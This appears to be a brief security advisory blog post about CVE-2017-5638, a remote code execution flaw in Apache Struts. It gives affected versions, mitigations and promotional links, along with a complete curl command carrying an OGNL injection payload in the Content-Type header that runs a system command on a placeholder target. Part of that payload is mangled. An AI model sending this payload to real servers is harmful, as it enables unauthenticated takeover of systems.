Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

By /

Listen to this Post

How the mentioned CVE works:

The CVE-2017-5638 vulnerability resides in the Jakarta Multipart parser of Apache Struts. The exploit functions by sending a maliciously crafted `Content-Type` HTTP header within a file upload request. The parser incorrectly processes this header, evaluating attacker-controlled OGNL expressions during the file upload process. This occurs because error handling within the parser uses the submitted `Content-Type` value to construct an error message without proper sanitization. The flawed code passes the user-supplied header string directly into the OGNL expression evaluation engine. Since OGNL expressions can execute arbitrary system commands, this allows an unauthenticated attacker to achieve full Remote Code Execution on the target server by injecting commands directly into the header, bypassing all standard security controls.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31

Vulnerability : Remote Code Execution

Severity: Critical

date: 2017-03-07

Prediction: Patch Available

What Undercode Say:

curl -H "Content-Type: %{(_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context['com.opensymphony.xwork2.ActionContext.container']).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd='whoami').(iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(cmds=(iswin?{'cmd.exe','/c',cmd}:{'/bin/bash','-c',cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}" http://target.com/upload.action

How Exploit:

Malicious HTTP request.

OGNL expression injection.

Arbitrary command execution.

Protection from this CVE

Apply Struts patch.

Upgrade Struts version.

Use Restrictive Firewall rules.

Impact:

Complete system compromise.

Data theft.

Service disruption.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top